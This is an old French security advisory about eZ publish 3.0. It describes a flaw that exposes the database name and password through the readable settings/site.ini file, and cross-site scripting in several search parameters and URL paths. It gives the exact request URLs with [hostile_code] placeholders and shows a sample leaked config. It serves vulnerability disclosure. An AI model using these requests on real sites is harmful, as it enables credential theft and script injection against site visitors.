Date de Publication: 2003-04-15
 Titre: EzPublish 3.0 Information Disclosure and Cross Site Scripting
 K-Otik ID : 0018
 Exploitable à distance : Oui
 Exploitable en local : Oui

 
  * Description Technique - Exploit *

eZ publish 3.0 est un Content Management System open source.

  - Sensitive information disclosure :
    ------------------------------------
Une vulnérabilité a été découverte dans Ez publish permettant à un attaquant distant d'accéder a certaines informations sensibles tels que le nom et le mot de passe de la base de données. Cette vulnérabilité peut être exploitée par une simple url HTTP..

Par exemple, l'attaquant peut télécharger le fichier site.ini et accéder à de nombreuses informations comme cela :

http://[target]/settings/site.ini

------ site.ini -----

[DatabaseSettings]
DatabasePluginPath=
# Use either ezmysql or ezpostgresql
DatabaseImplementation=ezmysql
Server=localhost
User=nextgen
Password=nextgen
Database=nextgen
[...]

--------------------

  - Cross Site Scripting :
    ----------------------
De nombreux bugs ont été trouvés dans Ez Publish pouvant autoriser un attaquant à injecter des scripts dans les pages et exécuter ceux-ci sur le navigateur des visiteurs du portail. Ce type de failles "Cross-Site Scripting Vulnerability" est présente dans de nombreuses sections du site, un utilisateur mal intentionné peut injecter des liens et/ou des scripts hostiles.

http://[target]/index.php/content/search/?SectionID=3&SearchText=[hostile_code]
http://[target]/index.php/content/advancedsearch/?SearchText=[hostile_code]&
PhraseSearchText=[hostile_code]&SearchContentClassID=1&SearchSectionID=1&SearchDate=1&SearchButton=Search

http://[target]/index.php/[any_section]/">[hostile_code]<
http://[target]/index.php/">